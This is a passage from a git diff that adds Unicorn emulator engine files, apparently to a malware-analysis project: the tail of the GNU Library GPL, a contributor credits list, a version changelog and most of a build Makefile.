complete corresponding machine-readable source code, which +must be distributed under the terms of Sections 1 and 2 above on a +medium customarily used for software interchange. + + If distribution of object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the +source code from the same place satisfies the requirement to +distribute the source code, even though third parties are not +compelled to copy the source along with the object code. + + 5. A program that contains no derivative of any portion of the +Library, but is designed to work with the Library by being compiled or +linked with it, is called a "work that uses the Library". Such a +work, in isolation, is not a derivative work of the Library, and +therefore falls outside the scope of this License. + + However, linking a "work that uses the Library" with the Library +creates an executable that is a derivative of the Library (because it +contains portions of the Library), rather than a "work that uses the +library". The executable is therefore covered by this License. +Section 6 states terms for distribution of such executables. + + When a "work that uses the Library" uses material from a header file +that is part of the Library, the object code for the work may be a +derivative work of the Library even though the source code is not. +Whether this is true is especially significant if the work can be +linked without the Library, or if the work is itself a library. The +threshold for this to be true is not precisely defined by law. + + If such an object file uses only numerical parameters, data +structure layouts and accessors, and small macros and small inline +functions (ten lines or less in length), then the use of the object +file is unrestricted, regardless of whether it is legally a derivative +work. (Executables containing this object code plus portions of the +Library will still fall under Section 6.) + + Otherwise, if the work is a derivative of the Library, you may +distribute the object code for the work under the terms of Section 6. +Any executables containing that work also fall under Section 6, +whether or not they are linked directly with the Library itself. + + 6. As an exception to the Sections above, you may also compile or +link a "work that uses the Library" with the Library to produce a +work containing portions of the Library, and distribute that work +under terms of your choice, provided that the terms permit +modification of the work for the customer's own use and reverse +engineering for debugging such modifications. + + You must give prominent notice with each copy of the work that the +Library is used in it and that the Library and its use are covered by +this License. You must supply a copy of this License. If the work +during execution displays copyright notices, you must include the +copyright notice for the Library among them, as well as a reference +directing the user to the copy of this License. Also, you must do one +of these things: + + a) Accompany the work with the complete corresponding + machine-readable source code for the Library including whatever + changes were used in the work (which must be distributed under + Sections 1 and 2 above); and, if the work is an executable linked + with the Library, with the complete machine-readable "work that + uses the Library", as object code and/or source code, so that the + user can modify the Library and then relink to produce a modified + executable containing the modified Library. (It is understood + that the user who changes the contents of definitions files in the + Library will not necessarily be able to recompile the application + to use the modified definitions.) + + b) Accompany the work with a written offer, valid for at + least three years, to give the same user the materials + specified in Subsection 6a, above, for a charge no more + than the cost of performing this distribution. + + c) If distribution of the work is made by offering access to copy + from a designated place, offer equivalent access to copy the above + specified materials from the same place. + + d) Verify that the user has already received a copy of these + materials or that you have already sent this user a copy. + + For an executable, the required form of the "work that uses the +Library" must include any data and utility programs needed for +reproducing the executable from it. However, as a special exception, +the source code distributed need not include anything that is normally +distributed (in either source or binary form) with the major +components (compiler, kernel, and so on) of the operating system on +which the executable runs, unless that component itself accompanies +the executable. + + It may happen that this requirement contradicts the license +restrictions of other proprietary libraries that do not normally +accompany the operating system. Such a contradiction means you cannot +use both them and the Library together in an executable that you +distribute. + + 7. You may place library facilities that are a work based on the +Library side-by-side in a single library together with other library +facilities not covered by this License, and distribute such a combined +library, provided that the separate distribution of the work based on +the Library and of the other library facilities is otherwise +permitted, and provided that you do these two things: + + a) Accompany the combined library with a copy of the same work + based on the Library, uncombined with any other library + facilities. This must be distributed under the terms of the + Sections above. + + b) Give prominent notice with the combined library of the fact + that part of it is a work based on the Library, and explaining + where to find the accompanying uncombined form of the same work. + + 8. You may not copy, modify, sublicense, link with, or distribute +the Library except as expressly provided under this License. Any +attempt otherwise to copy, modify, sublicense, link with, or +distribute the Library is void, and will automatically terminate your +rights under this License. However, parties who have received copies, +or rights, from you under this License will not have their licenses +terminated so long as such parties remain in full compliance. + + 9. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Library or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Library (or any work based on the +Library), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Library or works based on it. + + 10. Each time you redistribute the Library (or any work based on the +Library), the recipient automatically receives a license from the +original licensor to copy, distribute, link with or modify the Library +subject to these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 11. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Library at all. For example, if a patent +license would not permit royalty-free redistribution of the Library by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Library. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply, +and the section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 12. If the distribution and/or use of the Library is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Library under this License may add +an explicit geographical distribution limitation excluding those countries, +so that distribution is permitted only in or among countries not thus +excluded. In such case, this License incorporates the limitation as if +written in the body of this License. + + 13. The Free Software Foundation may publish revised and/or new +versions of the Library General Public License from time to time. +Such new versions will be similar in spirit to the present version, +but may differ in detail to address new problems or concerns. + +Each version is given a distinguishing version number. If the Library +specifies a version number of this License which applies to it and +"any later version", you have the option of following the terms and +conditions either of that version or of any later version published by +the Free Software Foundation. If the Library does not specify a +license version number, you may choose any version ever published by +the Free Software Foundation. + + 14. If you wish to incorporate parts of the Library into other free +programs whose distribution conditions are incompatible with these, +write to the author to ask for permission. For software which is +copyrighted by the Free Software Foundation, write to the Free +Software Foundation; we sometimes make exceptions for this. Our +decision will be guided by the two goals of preserving the free status +of all derivatives of our free software and of promoting the sharing +and reuse of software generally. + + NO WARRANTY + + 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO +WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. +EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR +OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY +KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME +THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN +WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY +AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU +FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR +CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE +LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A +FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF +SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH +DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Libraries + + If you develop a new library, and you want it to be of the greatest +possible use to the public, we recommend making it free software that +everyone can redistribute and change. You can do so by permitting +redistribution under these terms (or, alternatively, under the terms of the +ordinary General Public License). + + To apply these terms, attach the following notices to the library. It is +safest to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least the +"copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Library General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Library General Public License for more details. + + You should have received a copy of the GNU Library General Public + License along with this library; if not, write to the + Free Software Foundation, Inc., 59 Temple Place - Suite 330, + Boston, MA 02111-1307 USA. + +Also add information on how to contact you by electronic and paper mail. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the library, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the + library `Frob' (a library for tweaking knobs) written by James Random Hacker. + + , 1 April 1990 + Ty Coon, President of Vice + +That's all there is to it! diff --git a/ai_anti_malware/unicorn/unicorn-master/CREDITS.TXT b/ai_anti_malware/unicorn/unicorn-master/CREDITS.TXT new file mode 100644 index 0000000..586d15e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/CREDITS.TXT @@ -0,0 +1,75 @@ +This file credits all the contributors of the Unicorn engine project. + + +Key developers +============== +Nguyen Anh Quynh +Dang Hoang Vu + + +Beta testers (in no particular order) +============================== +Nguyen Tan Cong +Loi Anh Tuan +Edgar Barbosa +Joxean Koret +Chris Eagle +Jay Little, Trail of Bits +Jeong Wook Oh +Luis Miras +Yan Shoshitaishvili, Shellphish & UC Santa Barbara +Erik Fischer +Darel Griffin, NCC Group +Anton Cherepanov +Mohamed Saher (halsten) +Tyler Colgan +Jonathon Reinhart +Blue Skeye +Chris Maixner +Sergi Alvarez, aka pancake (author of radare) +Ryan Hileman +Tim "diff" Strazzere +WanderingGlitch of the Zero Day Initiative +Sascha Schirra +François Serman +Sean Heelan +Luke Burnett +Parker Thompson +Daniel Godas-Lopez +Antonio "s4tan" Parata +Corey Kallenberg +Shift +Gabriel Quadros +Fabian Yamaguchi +Ralf-Philipp Weinmann +Mike Guidry +Joshua "posixninja" Hill + + +Contributors (in no particular order) +===================================== +(Please let us know if you want to have your name here) + +Nguyen Tan Cong +Loi Anh Tuan +Shaun Wheelhouse: Homebrew package +Kamil Rytarowski: Pkgsrc package +Zak Escano: MSVC support. +Chris Eagle: Java binding +Ryan Hileman: Go binding +Antonio Parata: .NET binding +Jonathon Reinhart: C unit test +Sascha Schirra: Ruby binding +Adrian Herrera: Haskell binding +practicalswift: Various cool bugs found by fuzzing +farmdve: Memory leaking fix +Andrew Dutcher: uc_context_{save, restore} API. +Stephen Groat: improved CI setup. +David Zimmer: VB6 binding. +zhangwm: ARM & ARM64 big endian. +Mohamed Osama: FreePascal/Delphi binding. +Philippe Antoine (Catena cyber): fuzzing +Huitao Chen (chenhuitao) & KaiJern Lau (xwings): Cmake support +Huitao Chen (chenhuitao) & KaiJern Lau (xwings): Python3 support for building +Kevin Foo (chfl4gs): Travis-CI migration +Ziqiao Kong (lazymio): uc_context_free() API and various bug fix & improvement. diff --git a/ai_anti_malware/unicorn/unicorn-master/ChangeLog b/ai_anti_malware/unicorn/unicorn-master/ChangeLog new file mode 100644 index 0000000..64fb906 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/ChangeLog @@ -0,0 +1,115 @@ +This file details the changelog of Unicorn Engine. + +----------------------------------- +[Version 1.0.2]: October 21st, 2020 + +- Fix Java binding compilation +- Enable building for ARM little-endian only (ignore big-endian) + +------------------------------------ +[Version 1.0.2-rc6]: Sept 24th, 2020 + +- Add uc_context_free() API +- Fix context saving/retoring API (core & Python binding) + +------------------------------------ +[Version 1.0.2-rc5]: Sept 22nd, 2020 + +- Add cmake option to build Unicorn as a static library +- Fix error handling of mmap() +- uc_emu_start() can be reentrant +- Fix naming conflicts when built with systemd +- Fix setjmp/longjmp on native Windows +- Fix enabled hooks even after deleting them +- X86: + - Fix 64bit fstenv + - Fix IP value of 16bit mode +- ARM: + - Fix APSR handling +- Python: Remove UC_ERR_TIMEOUT + +----------------------------------- +[Version 1.0.2-rc4]: May 29th, 2020 + +- No longer require Python to build +- Fix recursive UC_HOOK_MEM callbacks for cross pages access +- Remove UC_ERR_TIMEOUT, so timeout on uc_emu_start() is not considered error +- Added UC_QUERY_TIMEOUT to query exit reason +- Fix UAF when deleting hook while in hook callback +- Ensure that hooks are unaffected by a request to stop emulation. +- Fix block hooks being called twice after an early exit from execution. +- Fix binding install on python2 (MacOS) +- X86: + - Support read/write STn registers + - Support read/write X64 base regs +- ARM64: + - Support some new registers + +---------------------------------- +[Version 1.0.1]: April 20th, 2017 + +- Properly handle selected-architecture build. +- Fix compilation issues on PPC & S390x. +- Fix a memory leak on uc_mem_protect(). +- ARM: + - Support big-endian mode. + - Correct instruction size of Thumb/Thumb2 code. + - Support read/write APSR register. +- ARM64: + - Support read/write NEON registers. + - Support read/write NZCV registers. +- Mips: Support read/write Mips64 registers. +- X86: Support read/write MSR. +- Haskell binding: update to the latest API. +- Python: allow not having PATH setup. + +---------------------------------- +[Version 1.0]: February 23rd, 2017 + +- Fix build script for BSD host. +- Fix building Unicorn on Arm/PPC/Sparc/S390 hosts. +- X86: + - Fix 16bit address computation. + - Fix initial state of segment registers. + +---------------------------------- +[Version 1.0-rc3]: January 25th, 2017 + +- Rename API uc_context_free() to uc_free(). +- ARM: + - uc_reg_write() now can modify CPSR register. + - Add some ARM coproc registers. +- ARM64: uc_reg_read|write() now handles W0-W31 registers. +- Windows: fix a double free bug in uc_close(). +- New VB6 binding. +- Java: update to support new APIs from v1.0-rc1. +- Python: + - Fix memory leaking that prevents UC instances from being GC. + - Remove some dependencies leftover from glib time. + - Add new method mem_regions() (linked to uc_mem_regions() API) + +---------------------------------- +[Version 1.0-rc2]: January 4th, 2017 + +- Remove glib & pkconfig dependency. +- Python: fix an issue to restore support for FreeBSD (and other *BSD Unix). +- ARM: support MCLASS cpu (Cortex-M3). +- Windows: export a static lib that can be used outside of Mingw + +---------------------------------- +[Version 1.0-rc1]: December 22nd, 2016 + +- Lots of bugfixes in all architectures. +- Better support for ARM Thumb. +- Fix many memory leaking issues. +- New bindings: Haskell, MSVC. +- Better support for Python3. +- New APIs: uc_query, uc_reg_write_batch, uc_reg_read_batch, uc_mem_map_ptr, uc_mem_regions, uc_context_alloc, uc_context_save & uc_context_restore. +- New memory hook type: UC_HOOK_MEM_READ_AFTER. +- Add new version macros UC_VERSION_{MAJOR, MINOR, EXTRA} + +---------------------------------- +[Version 0.9]: October 15th, 2015 + +- Initial public release. + diff --git a/ai_anti_malware/unicorn/unicorn-master/Makefile b/ai_anti_malware/unicorn/unicorn-master/Makefile new file mode 100644 index 0000000..5128a02 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/Makefile @@ -0,0 +1,424 @@ +# Unicorn Emulator Engine +# By Dang Hoang Vu , 2015 + + +.PHONY: all clean install uninstall dist header + +include config.mk +include pkgconfig.mk # package version + +LIBNAME = unicorn +UNAME_S := $(shell uname -s) +# SMP_MFLAGS is used for controlling the amount of parallelism used +# in external 'make' invocations. If the user doesn't override it, it +# does "-j4". That is, it uses 4 job threads. If you want to use more or less, +# pass in a different -jX, with X being the number of threads. +# For example, to completely disable parallel building, pass "-j1". +# If you want to use 16 job threads, use "-j16". +SMP_MFLAGS := -j4 + +UC_GET_OBJ = $(shell for i in \ + $$(grep '$(1)' $(2) | \ + grep '\.o' | cut -d '=' -f 2); do \ + echo $$i | grep '\.o' > /dev/null 2>&1; \ + if [ $$? = 0 ]; then \ + echo '$(3)'$$i; \ + fi; done; echo) + +UC_TARGET_OBJ = $(filter-out qemu/../%,$(call UC_GET_OBJ,obj-,qemu/Makefile.objs, qemu/)) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-,qemu/hw/core/Makefile.objs, qemu/hw/core/) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-,qemu/qapi/Makefile.objs, qemu/qapi/) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-,qemu/qobject/Makefile.objs, qemu/qobject/) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-,qemu/qom/Makefile.objs, qemu/qom/) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-y,qemu/util/Makefile.objs, qemu/util/) +ifneq ($(filter MINGW%,$(UNAME_S)),) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-$$(CONFIG_WIN32),qemu/util/Makefile.objs, qemu/util/) +else +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-$$(CONFIG_POSIX),qemu/util/Makefile.objs, qemu/util/) +endif + +UC_TARGET_OBJ_X86 = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/x86_64-softmmu/) +UC_TARGET_OBJ_X86 += $(call UC_GET_OBJ,obj-,qemu/hw/i386/Makefile.objs, qemu/x86_64-softmmu/hw/i386/) +UC_TARGET_OBJ_X86 += $(call UC_GET_OBJ,obj-,qemu/hw/intc/Makefile.objs, qemu/x86_64-softmmu/hw/intc/) +UC_TARGET_OBJ_X86 += $(call UC_GET_OBJ,obj-,qemu/target-i386/Makefile.objs, qemu/x86_64-softmmu/target-i386/) + +UC_TARGET_OBJ_ARM = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/arm-softmmu/) +UC_TARGET_OBJ_ARM += $(call UC_GET_OBJ,obj-,qemu/hw/arm/Makefile.objs, qemu/arm-softmmu/hw/arm/) +UC_TARGET_OBJ_ARM += $(call UC_GET_OBJ,obj-y,qemu/target-arm/Makefile.objs, qemu/arm-softmmu/target-arm/) +UC_TARGET_OBJ_ARM += $(call UC_GET_OBJ,obj-$$(CONFIG_SOFTMMU),qemu/target-arm/Makefile.objs, qemu/arm-softmmu/target-arm/) +UC_TARGET_OBJ_ARM += $(call UC_GET_OBJ,obj-$$(TARGET_ARM),qemu/target-arm/Makefile.objs, qemu/arm-softmmu/target-arm/) + +UC_TARGET_OBJ_ARMEB = $(subst /arm-softmmu/,/armeb-softmmu/,$(UC_TARGET_OBJ_ARM)) + +UC_TARGET_OBJ_M68K = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/m68k-softmmu/) +UC_TARGET_OBJ_M68K += $(call UC_GET_OBJ,obj-,qemu/hw/m68k/Makefile.objs, qemu/m68k-softmmu/hw/m68k/) +UC_TARGET_OBJ_M68K += $(call UC_GET_OBJ,obj-,qemu/target-m68k/Makefile.objs, qemu/m68k-softmmu/target-m68k/) + +UC_TARGET_OBJ_AARCH64 = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/aarch64-softmmu/) +UC_TARGET_OBJ_AARCH64 += $(call UC_GET_OBJ,obj-,qemu/hw/arm/Makefile.objs, qemu/aarch64-softmmu/hw/arm/) +UC_TARGET_OBJ_AARCH64 += $(call UC_GET_OBJ,obj-y,qemu/target-arm/Makefile.objs, qemu/aarch64-softmmu/target-arm/) +UC_TARGET_OBJ_AARCH64 += $(call UC_GET_OBJ,obj-$$(CONFIG_SOFTMMU),qemu/target-arm/Makefile.objs, qemu/aarch64-softmmu/target-arm/) +UC_TARGET_OBJ_AARCH64 += $(call UC_GET_OBJ,obj-$$(TARGET_AARCH64),qemu/target-arm/Makefile.objs, qemu/aarch64-softmmu/target-arm/) + +UC_TARGET_OBJ_AARCH64EB = $(subst /aarch64-softmmu/,/aarch64eb-softmmu/,$(UC_TARGET_OBJ_AARCH64)) + +UC_TARGET_OBJ_MIPS = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/mips-softmmu/) +UC_TARGET_OBJ_MIPS += $(call UC_GET_OBJ,obj-,qemu/hw/mips/Makefile.objs, qemu/mips-softmmu/hw/mips/) +UC_TARGET_OBJ_MIPS += $(call UC_GET_OBJ,obj-,qemu/target-mips/Makefile.objs, qemu/mips-softmmu/target-mips/) + +UC_TARGET_OBJ_MIPSEL = $(subst /mips-softmmu/,/mipsel-softmmu/,$(UC_TARGET_OBJ_MIPS)) + +UC_TARGET_OBJ_MIPS64 = $(subst /mips-softmmu/,/mips64-softmmu/,$(UC_TARGET_OBJ_MIPS)) + +UC_TARGET_OBJ_MIPS64EL = $(subst /mips-softmmu/,/mips64el-softmmu/,$(UC_TARGET_OBJ_MIPS)) + +UC_TARGET_OBJ_SPARC = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/sparc-softmmu/) +UC_TARGET_OBJ_SPARC += $(call UC_GET_OBJ,obj-,qemu/hw/sparc/Makefile.objs, qemu/sparc-softmmu/hw/sparc/) +UC_TARGET_OBJ_SPARC += $(call UC_GET_OBJ,obj-y,qemu/target-sparc/Makefile.objs, qemu/sparc-softmmu/target-sparc/) +UC_TARGET_OBJ_SPARC += $(call UC_GET_OBJ,obj-$$(TARGET_SPARC),qemu/target-sparc/Makefile.objs, qemu/sparc-softmmu/target-sparc/) + +UC_TARGET_OBJ_SPARC64 = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/sparc64-softmmu/) +UC_TARGET_OBJ_SPARC64 += $(call UC_GET_OBJ,obj-,qemu/hw/sparc64/Makefile.objs, qemu/sparc64-softmmu/hw/sparc64/) +UC_TARGET_OBJ_SPARC64 += $(call UC_GET_OBJ,obj-y,qemu/target-sparc/Makefile.objs, qemu/sparc64-softmmu/target-sparc/) +UC_TARGET_OBJ_SPARC64 += $(call UC_GET_OBJ,obj-$$(TARGET_SPARC64),qemu/target-sparc/Makefile.objs, qemu/sparc64-softmmu/target-sparc/) + +ifneq (,$(findstring x86,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_X86) + UNICORN_CFLAGS += -DUNICORN_HAS_X86 + UNICORN_TARGETS += x86_64-softmmu, +endif +ifneq (,$(findstring arm,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_ARM) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_ARMEB) + UNICORN_CFLAGS += -DUNICORN_HAS_ARM + UNICORN_CFLAGS += -DUNICORN_HAS_ARMEB + UNICORN_TARGETS += arm-softmmu, + UNICORN_TARGETS += armeb-softmmu, +endif +ifneq (,$(findstring m68k,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_M68K) + UNICORN_CFLAGS += -DUNICORN_HAS_M68K + UNICORN_TARGETS += m68k-softmmu, +endif +ifneq (,$(findstring aarch64,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_AARCH64) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_AARCH64EB) + UNICORN_CFLAGS += -DUNICORN_HAS_ARM64 + UNICORN_CFLAGS += -DUNICORN_HAS_ARM64EB + UNICORN_TARGETS += aarch64-softmmu, + UNICORN_TARGETS += aarch64eb-softmmu, +endif +ifneq (,$(findstring mips,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_MIPS) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_MIPSEL) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_MIPS64) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_MIPS64EL) + UNICORN_CFLAGS += -DUNICORN_HAS_MIPS + UNICORN_CFLAGS += -DUNICORN_HAS_MIPSEL + UNICORN_CFLAGS += -DUNICORN_HAS_MIPS64 + UNICORN_CFLAGS += -DUNICORN_HAS_MIPS64EL + UNICORN_TARGETS += mips-softmmu, + UNICORN_TARGETS += mipsel-softmmu, + UNICORN_TARGETS += mips64-softmmu, + UNICORN_TARGETS += mips64el-softmmu, +endif +ifneq (,$(findstring sparc,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_SPARC) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_SPARC64) + UNICORN_CFLAGS += -DUNICORN_HAS_SPARC + UNICORN_TARGETS += sparc-softmmu,sparc64-softmmu, +endif + +UC_OBJ_ALL = $(UC_TARGET_OBJ) list.o uc.o + +UNICORN_CFLAGS += -fPIC + +# Verbose output? +V ?= 0 + +# on MacOS, by default do not compile in Universal format +MACOS_UNIVERSAL ?= no + +ifeq ($(UNICORN_DEBUG),yes) +CFLAGS += -g +else +CFLAGS += -O3 +UNICORN_QEMU_FLAGS += --disable-debug-info +endif + +ifeq ($(UNICORN_ASAN),yes) +CC = clang -fsanitize=address -fno-omit-frame-pointer +CXX = clang++ -fsanitize=address -fno-omit-frame-pointer +AR = llvm-ar +LDFLAGS := -fsanitize=address ${LDFLAGS} +endif + +ifeq ($(CROSS),) +CC ?= cc +AR ?= ar +RANLIB ?= ranlib +STRIP ?= strip +else +CC = $(CROSS)-gcc +AR = $(CROSS)-ar +RANLIB = $(CROSS)-ranlib +STRIP = $(CROSS)-strip +endif + +ifeq ($(PKG_EXTRA),) +PKG_VERSION = $(PKG_MAJOR).$(PKG_MINOR) +else +PKG_VERSION = $(PKG_MAJOR).$(PKG_MINOR).$(PKG_EXTRA) +endif + +API_MAJOR=$(shell echo `grep -e UC_API_MAJOR include/unicorn/unicorn.h | grep -v = | awk '{print $$3}'` | awk '{print $$1}') + +# Apple? +ifeq ($(UNAME_S),Darwin) +EXT = dylib +VERSION_EXT = $(API_MAJOR).$(EXT) +$(LIBNAME)_LDFLAGS += -dynamiclib -install_name @rpath/lib$(LIBNAME).$(VERSION_EXT) -current_version $(PKG_MAJOR).$(PKG_MINOR).$(PKG_EXTRA) -compatibility_version $(PKG_MAJOR).$(PKG_MINOR) +AR_EXT = a +UNICORN_CFLAGS += -fvisibility=hidden + +ifeq ($(MACOS_UNIVERSAL),yes) +$(LIBNAME)_LDFLAGS += -m32 -arch i386 -m64 -arch x86_64 +UNICORN_CFLAGS += -m32 -arch i386 -m64 -arch x86_64 +endif + +# Cygwin? +else ifneq ($(filter CYGWIN%,$(UNAME_S)),) +EXT = dll +AR_EXT = a +BIN_EXT = .exe +UNICORN_CFLAGS := $(UNICORN_CFLAGS:-fPIC=) +#UNICORN_QEMU_FLAGS += --disable-stack-protector + +# mingw? +else ifneq ($(filter MINGW%,$(UNAME_S)),) +EXT = dll +AR_EXT = a +BIN_EXT = .exe +UNICORN_QEMU_FLAGS += --disable-stack-protector +UNICORN_CFLAGS := $(UNICORN_CFLAGS:-fPIC=) +$(LIBNAME)_LDFLAGS += -Wl,--output-def,unicorn.def +DO_WINDOWS_EXPORT = 1 + +# Haiku +else ifneq ($(filter Haiku%,$(UNAME_S)),) +EXT = so +VERSION_EXT = $(EXT).$(API_MAJOR) +AR_EXT = a +$(LIBNAME)_LDFLAGS += -Wl,-Bsymbolic-functions,-soname,lib$(LIBNAME).$(VERSION_EXT) +UNICORN_CFLAGS := $(UNICORN_CFLAGS:-fPIC=) +UNICORN_QEMU_FLAGS += --disable-stack-protector + +# Linux, Darwin +else +EXT = so +VERSION_EXT = $(EXT).$(API_MAJOR) +AR_EXT = a +$(LIBNAME)_LDFLAGS += -Wl,-Bsymbolic-functions,-soname,lib$(LIBNAME).$(VERSION_EXT) +UNICORN_CFLAGS += -fvisibility=hidden +endif + +ifeq ($(UNICORN_SHARED),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) +LIBRARY = $(LIBNAME).$(EXT) +else ifneq ($(filter CYGWIN%,$(UNAME_S)),) +LIBRARY = cyg$(LIBNAME).$(EXT) +LIBRARY_DLLA = lib$(LIBNAME).$(EXT).$(AR_EXT) +$(LIBNAME)_LDFLAGS += -Wl,--out-implib=$(LIBRARY_DLLA) +$(LIBNAME)_LDFLAGS += -lssp +# Linux, Darwin +else +LIBRARY = lib$(LIBNAME).$(VERSION_EXT) +LIBRARY_SYMLINK = lib$(LIBNAME).$(EXT) +endif +endif + +ifeq ($(UNICORN_STATIC),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) +ARCHIVE = $(LIBNAME).$(AR_EXT) +# Cygwin, Linux, Darwin +else +ARCHIVE = lib$(LIBNAME).$(AR_EXT) +endif +endif + +INSTALL_BIN ?= install +INSTALL_DATA ?= $(INSTALL_BIN) -m0644 +INSTALL_LIB ?= $(INSTALL_BIN) -m0755 +PKGCFGF = $(LIBNAME).pc +PREFIX ?= /usr +DESTDIR ?= + +LIBDIRARCH ?= lib +# Uncomment the below line to installs x86_64 libs to lib64/ directory. +# Or better, pass 'LIBDIRARCH=lib64' to 'make install/uninstall' via 'make.sh'. +#LIBDIRARCH ?= lib64 + +LIBDIR ?= $(PREFIX)/$(LIBDIRARCH) +INCDIR ?= $(PREFIX)/include +BINDIR ?= $(PREFIX)/bin + +LIBDATADIR ?= $(LIBDIR) + +# Don't redefine $LIBDATADIR when global environment variable +# USE_GENERIC_LIBDATADIR is set. This is used by the pkgsrc framework. + +ifndef USE_GENERIC_LIBDATADIR +ifeq ($(UNAME_S), FreeBSD) +LIBDATADIR = $(PREFIX)/libdata +else ifeq ($(UNAME_S), DragonFly) +LIBDATADIR = $(PREFIX)/libdata +endif +endif + +ifeq ($(PKG_EXTRA),) +PKGCFGDIR = $(LIBDATADIR)/pkgconfig +else +PKGCFGDIR ?= $(LIBDATADIR)/pkgconfig +endif + +$(LIBNAME)_LDFLAGS += -lm + +.PHONY: test fuzz bindings clean FORCE + +all: unicorn + $(MAKE) -C samples + +qemu/config-host.mak: qemu/configure + cd qemu && \ + ./configure --cc="${CC}" --extra-cflags="$(UNICORN_CFLAGS)" --target-list="$(UNICORN_TARGETS)" ${UNICORN_QEMU_FLAGS} + @printf "$(UNICORN_ARCHS)" > config.log + +uc.o: qemu/config-host.mak FORCE + $(MAKE) -C qemu $(SMP_MFLAGS) + +$(UC_TARGET_OBJ) list.o: uc.o + @echo "--- $^ $@" > /dev/null + +unicorn: $(LIBRARY) $(ARCHIVE) + +$(LIBRARY): 